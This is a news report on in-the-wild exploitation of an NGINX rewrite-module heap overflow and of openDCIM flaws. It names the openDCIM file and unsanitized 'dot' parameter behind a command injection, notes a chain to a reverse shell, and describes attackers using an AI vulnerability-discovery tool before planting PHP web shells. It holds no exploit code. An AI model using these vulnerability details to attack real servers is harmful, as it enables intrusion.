According to VulnCheck, a newly disclosed security flaw affecting NGINX Plus and NGINX Open has become exploitable in the wild just days after its publication.
The vulnerability, tracked as CVE-2026-42945 (CVSS score: 9.2), is a heap buffer overflow in ngx_http_rewrite_module that affects NGINX versions 0.6.27 through 1.30.0. According to AI-native security firm DepthFirst, the vulnerability was introduced in 2008.
Successful exploitation of this flaw could allow an unauthenticated attacker to crash the worker process or potentially execute remote code via a crafted HTTP request. However, note that code execution is only possible on devices where Address Space Layout Randomization (ASLR), a safeguard against memory-based attacks, is turned off.
“This vulnerability relies on a specific NGINX configuration, which an attacker could learn or discover and exploit,” said security researcher Kevin Beaumont. “To reach RCE [remote code execution]ASLR must also be disabled on the box. ”
In a similar review, an AlmaLinux maintainer said: “Turning a heap overflow into reliable code execution is not trivial with default settings, and we do not expect that systems with ASLR enabled (the default in all supported AlmaLinux releases) will make it easy to create a generic and reliable exploit.”
“However, ‘not easy’ does not mean ‘impossible’. Worker crash DoS is exploitable enough on its own, so we recommend treating this as an emergency,” the maintainer added.
VulnCheck’s latest findings show that attackers are starting to weaponize this flaw and are detecting attempts to exploit its honeypot networks. The nature and ultimate goal of the campaign is currently unknown. We recommend that users apply the latest fixes for F5 to protect their networks from active threats.
flaws in openDCIM can also be exploited
This development comes after VulnCheck revealed an exploit campaign targeting two critical flaws in openDCIM, an open source application used for data center infrastructure management. Both vulnerabilities are rated 9.3 on the CVSS scoring system and are listed below.
CVE-2026-28515 – Insufficient authentication vulnerability could allow authenticated users to access LDAP configuration functions regardless of assigned privileges. In Docker deployments where REMOTE_USER is set without enforcing authentication, it is possible to reach the endpoint without credentials, allowing unauthorized changes to the application configuration. CVE-2026-28517 – Operating system command injection vulnerability affecting the “report_network_map.php” component. This component processes a parameter called “dot” without sanitizing it and passes it directly to the shell command, resulting in arbitrary code execution.
These two vulnerabilities were discovered by VulnCheck security researcher Valentin Lobstein in February 2026, alongside the openDCIM SQL injection vulnerability CVE-2026-28516 (CVSS score: 9.3). According to Lobstein, the three flaws could be chained together to execute remote code in five HTTP requests and generate a reverse shell.
Caitlin Condon, vice president of security research at VulnCheck, said: “The cluster of threat actors we’ve observed so far originates from a single Chinese IP, using what appears to be a customized implementation of the AI vulnerability discovery tool Vulnhuntr to automatically check for vulnerable installations before dropping a PHP web shell.”
Source link
